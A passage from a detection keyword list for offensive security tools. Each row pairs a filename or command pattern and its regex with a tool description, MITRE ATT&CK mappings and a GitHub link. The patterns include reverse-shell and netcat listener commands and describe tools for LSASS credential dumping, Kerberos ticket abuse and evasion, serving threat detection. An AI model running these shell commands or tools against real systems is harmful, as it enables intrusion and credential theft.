- TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*nanodump-pipes*",".{0,1000}nanodump\-pipes.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*NanoDumpWriteDump*",".{0,1000}NanoDumpWriteDump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanorobeus*_cs.x64.*",".{0,1000}nanorobeus.{0,1000}_cs\.x64\..{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus*_cs.x86.*",".{0,1000}nanorobeus.{0,1000}_cs\.x86\..{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus*dump*",".{0,1000}nanorobeus.{0,1000}dump.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus.cna*",".{0,1000}nanorobeus\.cna.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus.py*",".{0,1000}nanorobeus\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*nanorobeus.x64*",".{0,1000}nanorobeus\.x64.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus.x64.*",".{0,1000}nanorobeus\.x64\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*nanorobeus.x86*",".{0,1000}nanorobeus\.x86.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus_brc4*",".{0,1000}nanorobeus_brc4.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus64*",".{0,1000}nanorobeus64.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus86*",".{0,1000}nanorobeus86.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus-main*",".{0,1000}nanorobeus\-main.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorubeus.*",".{0,1000}nanorubeus\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*Narasimha1997/fake-sms*",".{0,1000}Narasimha1997\/fake\-sms.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2663","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*Nasir Khan (r0ot h3x49)*",".{0,1000}Nasir\sKhan\s\(r0ot\sh3x49\).{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*nasm -f win64 ./syscalls.asm -o ./syscalls.obj*",".{0,1000}nasm\s\-f\swin64\s\.\/syscalls\.asm\s\-o\s\.\/syscalls\.obj.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*NativeDump.exe *.dmp*",".{0,1000}NativeDump\.exe\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*NativeEasyHook32.dll*",".{0,1000}NativeEasyHook32\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*NativeEasyHook64.dll*",".{0,1000}NativeEasyHook64\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*Naughty-Script.ps1*",".{0,1000}Naughty\-Script\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*NBNSBruteForceHost*",".{0,1000}NBNSBruteForceHost.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*NBNSBruteForcePause*",".{0,1000}NBNSBruteForcePause.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*NBNSBruteForceSpoofer*",".{0,1000}NBNSBruteForceSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*NBNSBruteForceTarget*",".{0,1000}NBNSBruteForceTarget.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*nbnsspoof.py*",".{0,1000}nbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*NBNSSpoofer*",".{0,1000}NBNSSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*nc 127.0.0.1 4000*",".{0,1000}nc\s127\.0\.0\.1\s4000.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*nc -e /bin/sh * *",".{0,1000}nc\s\-e\s\/bin\/sh\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*nc -nlvp 4444*",".{0,1000}nc\s\-nlvp\s4444.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","N/A","N/A","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*nc -vlp 4444*",".{0,1000}nc\s\-vlp\s4444.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*nc -vlp 4445*",".{0,1000}nc\s\-vlp\s4445.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*nc.exe 127.0.0.1 4444*",".{0,1000}nc\.exe\s127\.0\.0\.1\s4444.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*nc.exe -l -p 1337*",".{0,1000}nc\.exe\s\-l\s\-p\s1337.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*nc64 127.0.0.1 9000 -e cmd.exe*",".{0,1000}nc64\s127\.0\.0\.1\s9000\s\-e\scmd\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*nc64 -L -vv -p 9000*",".{0,1000}nc64\s\-L\s\-vv\s\-p\s9000.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*nccgroup/ABPTTS*",".{0,1000}nccgroup\/ABPTTS.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*nccgroup/Accomplice*",".{0,1000}nccgroup\/Accomplice.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*nccgroup/demiguise*",".{0,1000}nccgroup\/demiguise.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1344","253","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "*nccgroup/SCOMDecrypt*",".{0,1000}nccgroup\/SCOMDecrypt.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*ncrack-*.dmg*",".{0,1000}ncrack\-.{0,1000}\.dmg.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*ncrack-*-setup.exe*",".{0,1000}ncrack\-.{0,1000}\-setup\.exe.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*ncrack.exe*",".{0,1000}ncrack\.exe.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*NcrackInstaller.exe*",".{0,1000}NcrackInstaller\.exe.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*ncrack-master.zip*",".{0,1000}ncrack\-master\.zip.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*ncrack-services*",".{0,1000}ncrack\-services.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*ndDelegation.py*",".{0,1000}ndDelegation\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ndp_spoof.*",".{0,1000}ndp_spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*Ne0nd0g/merlin*",".{0,1000}Ne0nd0g\/merlin.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Ne0nd0g/merlin-agent*",".{0,1000}Ne0nd0g\/merlin\-agent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*Ne0nd0g/merlin-agent-dll*",".{0,1000}Ne0nd0g\/merlin\-agent\-dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*needle_sift.x64*",".{0,1000}needle_sift\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 